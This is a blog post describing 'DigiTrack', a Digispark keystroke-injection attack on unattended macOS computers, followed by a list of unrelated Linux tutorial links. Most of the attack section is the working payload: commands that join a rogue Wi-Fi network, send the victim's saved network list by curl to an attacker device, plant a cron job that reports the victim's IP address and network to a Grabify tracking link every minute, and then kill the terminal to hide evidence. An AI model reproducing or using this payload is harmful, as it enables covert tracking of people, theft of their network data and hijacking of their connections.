DigiTrack : Attacks For $5 or Less Using Arduino

In 30 seconds, DigiTrack attack can learn which networks a MacOS computer has connected to before, and plant a script that tracks the current IP address and Wi-Fi network every 60 seconds.

It includes Hardtracker – Digispark VPN buster to send the IP address and BSSID/SSID of nearby Wi-Fi networks on a MacOS computer to a Grabify tracker every 60 seconds.

This is a $5 attack that does a couple things:

  • Inserts a Wi-Fi backdoor onto a victim computer, allowing you to capture the victim’s data connection at any time when you are in Wi-Fi range.
  • Steals a list of every network the victim has ever connected to (for tracking, classifying, and hijacking data connection)
  • Inserts a tracking job that send the IP address and currently connected network to a Grabify link every 60 seconds.

Also Read – CVE-2020-0796 : Windows SMBv3 Client/Server Remote Code Execution Vulnerability

Attack goes: A victim leaves a MacOS computer unattended for 30 seconds. The attacker inserts a DigiSpark board loaded with an attack payload. The payload looks like this (with delays and single key strokes removed):

  • DigiKeyboard.print(“networksetup -setairportnetwork en0 ‘sneakernet’ 00000000”);
    • We add the network “Sneakernet” to our trusted network list and connect to it.
  • DigiKeyboard.print(“curl -m 10 –silent –output /dev/null -X POST -H “Content-Type: text/plain” –data “$(networksetup -listpreferredwirelessnetworks en0)” 192.168.4.1 &”);
    • After connecting, we send a CURL request listing every single network the MacOS computer has connected to in the past to the esp8266 creating the “Sneakernet” network. The & puts the process in the background in case it takes too long, and the -m sets a timer of 10 seconds to prevent it taking too long. Now we know which Wi-Fi networks the victim has joined, and which networks will force the computer to connect without asking.
  • DigiKeyboard.print(“export VISUAL=nano; crontab -e”);
    • We create a job that will execute every 60 seconds
  • DigiKeyboard.print(“* * * * * curl –silent –output /dev/null –referer “$(/System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -I | awk ‘/ SSID/ {print substr($0, index($0, $2))}’)” https://grabi/YOURLINK“);
    • We suppress the output of CURL, and grab the network name of the currently connected Wi-Fi network. We sent this along with a CURL request to a tracking URL, delivering the target’s IP address and currently connected Wi-Fi network every 60 seconds.
  • DigiKeyboard.print(“wait && kill -9 $(ps -p $PPID -o ppid=)”);
    • Finally, we wait for all background processes to finish, and kill the shit out of the terminal window to hide the evidence.

Total run time is about 30 seconds, not including the few seconds the Digisparks waits for a sketch to upload.

Notes: Grabify may go into “I’m under attack” mode and not allow checkin. Look for this line: div class=”cf-browser-verification cf-im-under-attack”

If you see it, then the IP address is being blocked by cloudflare.

R K

Recent Posts

Understanding the Model Context Protocol (MCP) and How It Works

Introduction to the Model Context Protocol (MCP) The Model Context Protocol (MCP) is an open…

1 day ago

The file Command – Quickly Identify File Contents in Linux

While file extensions in Linux are optional and often misleading, the file command helps decode what a…

1 day ago

How to Use the touch Command in Linux

The touch command is one of the quickest ways to create new empty files or update timestamps…

1 day ago

How to Search Files and Folders in Linux Using the find Command

Handling large numbers of files is routine for Linux users, and that’s where the find command shines.…

1 day ago

How to Move and Rename Files in Linux with the mv Command

Managing files and directories is foundational for Linux workflows, and the mv (“move”) command makes it easy…

2 days ago

How to Create Directories in Linux with the mkdir Command

Creating directories is one of the earliest skills you'll use on a Linux system. The mkdir (make…

2 days ago